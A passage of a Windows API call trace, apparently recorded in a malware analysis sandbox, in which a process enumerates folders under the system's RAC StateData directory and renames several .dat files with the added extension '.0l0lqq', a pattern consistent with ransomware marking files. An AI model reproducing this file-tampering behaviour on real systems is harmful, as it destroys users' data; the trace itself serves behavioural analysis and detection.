lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.666] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outbound", cAlternateFileName="")) returned 1 [0252.666] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf5ad6e40, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xf5ad6e40, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PublishedData", cAlternateFileName="PUBLIS~1")) returned 1 [0252.666] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a1c2570, ftLastAccessTime.dwHighDateTime=0x1d6f0d1, ftLastWriteTime.dwLowDateTime=0x4a1c2570, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StateData", cAlternateFileName="STATED~1")) returned 1 [0252.666] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf5c07940, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xf5c07940, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0252.666] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf5c07940, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xf5c07940, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0252.666] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0252.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.667] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf5c07940, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0x4a25aaf0, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.667] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf5c07940, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0x4a25aaf0, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0252.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.667] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf5c07940, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0x4a25aaf0, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.668] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf5c07940, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0x4a25aaf0, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0252.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.668] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a1c2570, ftLastAccessTime.dwHighDateTime=0x1d6f0d1, ftLastWriteTime.dwLowDateTime=0x4a1c2570, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.668] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb35800, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xecb35800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x4a234990, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacDatabase.sdf", cAlternateFileName="RACDAT~1.SDF")) returned 1 [0252.668] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0x4a25aaf0, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0252.668] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a1c2570, ftCreationTime.dwHighDateTime=0x1d6f0d1, ftLastAccessTime.dwLowDateTime=0x4a1c2570, ftLastAccessTime.dwHighDateTime=0x1d6f0d1, ftLastWriteTime.dwLowDateTime=0x4a1e86d0, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiDataBookmarks.dat", cAlternateFileName="RACWMI~2.DAT")) returned 1 [0252.668] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a1c2570, ftCreationTime.dwHighDateTime=0x1d6f0d1, ftLastAccessTime.dwLowDateTime=0x4a1c2570, ftLastAccessTime.dwHighDateTime=0x1d6f0d1, ftLastWriteTime.dwLowDateTime=0x4a1c2570, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiEventData.dat", cAlternateFileName="RACWMI~1.DAT")) returned 1 [0252.668] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a1c2570, ftCreationTime.dwHighDateTime=0x1d6f0d1, ftLastAccessTime.dwLowDateTime=0x4a1c2570, ftLastAccessTime.dwHighDateTime=0x1d6f0d1, ftLastWriteTime.dwLowDateTime=0x4a1c2570, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiEventData.dat", cAlternateFileName="RACWMI~1.DAT")) returned 0 [0252.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.668] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4a1c2570, ftLastAccessTime.dwHighDateTime=0x1d6f0d1, ftLastWriteTime.dwLowDateTime=0x4a1c2570, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.668] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb35800, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xecb35800, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x4a234990, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacDatabase.sdf", cAlternateFileName="RACDAT~1.SDF")) returned 1 [0252.669] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0x4a25aaf0, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0252.669] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a1c2570, ftCreationTime.dwHighDateTime=0x1d6f0d1, ftLastAccessTime.dwLowDateTime=0x4a1c2570, ftLastAccessTime.dwHighDateTime=0x1d6f0d1, ftLastWriteTime.dwLowDateTime=0x4a1e86d0, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiDataBookmarks.dat", cAlternateFileName="RACWMI~2.DAT")) returned 1 [0252.669] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a1c2570, ftCreationTime.dwHighDateTime=0x1d6f0d1, ftLastAccessTime.dwLowDateTime=0x4a1c2570, ftLastAccessTime.dwHighDateTime=0x1d6f0d1, ftLastWriteTime.dwLowDateTime=0x4a1c2570, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiEventData.dat", cAlternateFileName="RACWMI~1.DAT")) returned 1 [0252.669] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0252.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0252.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0252.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0252.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0252.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0252.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0252.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0252.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0252.671] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat", lpFilePart=0x0) returned 0x3a [0252.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0252.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0252.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0252.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0252.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0252.674] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0252.674] MoveFileW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racmetadata.dat"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat.0l0lqq" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racmetadata.dat.0l0lqq")) returned 1 [0252.679] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat", lpFilePart=0x0) returned 0x42 [0252.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0252.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0252.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0252.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0252.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0252.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0252.680] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat", lpFilePart=0x0) returned 0x42 [0252.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0252.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0252.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0252.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0252.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0252.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0252.684] MoveFileW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.0l0lqq" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat.0l0lqq")) returned 1 [0252.690] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat", lpFilePart=0x0) returned 0x3e [0252.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0252.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0252.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0252.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0252.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0252.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0252.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0252.691] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat", lpFilePart=0x0) returned 0x3e [0252.694] MoveFileW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racwmieventdata.dat"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat.0l0lqq" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racwmieventdata.dat.0l0lqq")) returned 1 [0252.699] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf5ad6e40, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xf5ad6e40, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.699] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf5ad6e40, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0x4a234990, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x35000, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 1 [0252.699] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf5ad6e40, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0x4a234990, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x35000, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0252.699] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf5ad6e40, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xf5ad6e40, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.699] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf5ad6e40, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0x4a234990, ftLastWriteTime.dwHighDateTime=0x1d6f0d1, nFileSizeHigh=0x0, nFileSizeLow=0x35000, dwReserved0=0x0, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 1 [0252.699] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0252.699] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.699] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0252.700] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0252.700] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xd6e33921, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0252.700] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, 